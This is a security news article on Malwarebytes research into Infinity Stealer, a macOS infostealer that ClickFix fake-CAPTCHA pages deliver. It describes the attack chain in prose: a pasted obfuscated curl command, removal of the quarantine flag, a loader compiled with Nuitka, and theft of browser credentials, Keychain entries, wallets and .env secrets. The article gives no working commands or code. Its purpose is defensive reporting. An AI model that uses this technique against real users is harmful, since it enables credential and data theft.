New Infinity Stealer malware grabs macOS data via ClickFix lures
A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using the open-source Nuitka compiler.
The attack uses the ClickFix technique, presenting a fake CAPTCHA that mimics Cloudflareâs human verification check to trick users into executing malicious code.
Researchers at Malwarebytes say this is the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.
Because Nuitka produces a native binary by compiling the Python script into C code, the resulting executable is more resistant to static analysis.
Compared to PyInstaller, which bundles Python with bytecode, itâs more evasive because it produces a real native binary with no obvious bytecode layer, making reverse engineering much harder.
âThe final payload is written in Python and compiled with Nuitka, producing a native macOS binary. That makes it harder to analyze and detect than typical Python-based malware,â Malwarebystes says.
Attack chain
The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a human verification step from Cloudflare and asking the user to complete the challenge by pasting a base64-obfuscated curl command into the macOS Terminal, bypassing OS-level defenses.
The command decodes a Bash script that writes the stage-2 (Nuitka loader) to /tmp, then removes the quarantine flag, and executes it via ânohup.â Finally, it passes the command-and-control (C2) and token via environment variables and then deletes itself and closes the Terminal window.
The Nuitka loader is an 8.6 MB Mach-O binary that contains a 35MB zstd-compressed archive, containing the stage-3 (UpdateHelper.bin), which is the Infinity Stealer malware.
Before starting to collect sensitive data, the malware performs anti-analysis checks to determine whether it is running in a virtualized/sandboxed environment.
Malwarebytesâ analysis of the Python 3.11 payload uncovered that the info-stealer can take screenshots and harvest the following data:
- Credentials from Chromiumâbased browsers and Firefox
- macOS Keychain entries
- Cryptocurrency wallets
- Plaintext secrets in developer files, such as .env
All stolen data is exfiltrated via HTTP POST requests to the C2, and a Telegram notification is sent to the threat actors upon completion of the operation.
Malwarebytes underlines that the appearance of malware like Infinity Stealer is proof that threats to macOS users are only getting more advanced and targeted.
Users should never paste into Terminal commands they find online and donât fully understand.
Automated Pentesting Covers Only 1 of 6 Surfaces.
Automated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the other.
This whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic questions for any tool evaluation.
Post a Comment Community Rules
You need to login in order to post a comment
Not a member yet? Register Now
How it works
Once you click Generate, Ollama reads this article and crafts 5 comprehension questions. Your answers are graded against the article content â general knowledge won't be enough. Score 70+ to count toward your certificate.
Questions are cached â you'll always get the same 5 for this article.